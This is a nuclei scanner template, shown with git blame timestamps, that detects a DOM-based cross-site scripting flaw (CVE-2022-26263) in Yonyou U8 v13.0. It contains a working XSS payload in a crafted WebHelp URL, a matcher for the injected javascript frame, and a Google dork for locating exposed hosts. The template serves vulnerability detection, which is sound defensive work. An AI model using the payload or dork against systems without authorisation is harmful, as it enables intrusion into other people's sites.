nuclei-templates/cves/2022/CVE-2022-26263.yaml

30 lines
917 B
YAML
Raw Normal View History

2022-10-06 08:11:10 +00:00
id: CVE-2022-26263
info:
name: Yonyou u8 v13.0 - Cross Site Scripting
2022-10-12 16:29:35 +00:00
author: edoardottt,theamanrawat
2022-10-06 08:11:10 +00:00
severity: medium
description: |
Yonyou u8 v13.0 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability via the component /u8sl/WebHelp.
reference:
- https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-26263
classification:
cve-id: CVE-2022-26263
metadata:
2022-10-12 16:29:35 +00:00
verified: true
2022-10-06 08:11:10 +00:00
google-dork: inurl:/u8sl/WebHelp
2022-10-12 16:29:35 +00:00
tags: cve,cve2022,yonyou,xss
2022-10-06 08:11:10 +00:00
2022-10-12 16:29:35 +00:00
headless:
- steps:
- args:
2022-10-28 12:49:33 +00:00
url: '{{BaseURL}}/U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"%27"><xsstag>()locxss")#javascript:console.log(document.domain)'
2022-10-12 16:29:35 +00:00
action: navigate
- action: waitload
2022-10-06 08:11:10 +00:00
matchers:
2022-10-06 09:50:27 +00:00
- type: word
words:
2022-10-12 16:29:35 +00:00
- '<frame src="javascript:console.log(document.domain)"'